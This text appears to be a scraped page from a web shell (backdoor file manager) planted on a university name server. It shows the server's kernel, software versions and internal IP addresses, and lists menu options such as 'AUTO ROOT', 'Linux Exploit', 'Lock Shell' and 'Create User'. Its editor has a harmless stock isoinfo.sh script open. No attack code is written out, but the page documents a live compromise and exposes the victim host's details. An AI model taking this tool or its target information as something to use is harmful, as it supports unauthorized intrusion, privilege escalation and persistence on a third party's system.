Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
libexec /
file-roller /
[ HOME SHELL ]
Name
Size
Permission
Action
isoinfo.sh
565
B
-rwxr-xr-x
rpm2cpio
14.38
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : isoinfo.sh
filename=$2 JOLIET=true ROCK_RIDGE=true ISOINFO=`isoinfo -d -i "$filename"` if echo $ISOINFO | grep "NO Joliet present" >/dev/null 2>&1; then JOLIET=false fi if echo $ISOINFO | grep "NO Rock Ridge present" >/dev/null 2>&1; then ROCK_RIDGE=false fi iso_extensions="" if test $ROCK_RIDGE = true; then iso_extensions="-R" elif test $JOLIET = true; then iso_extensions="-J" fi if test "x$3" = x-x; then file_to_extract=$4 outfile=$5 isoinfo $iso_extensions -i "$filename" -x "$file_to_extract" > "$outfile" else isoinfo $iso_extensions -i "$filename" -l fi
Close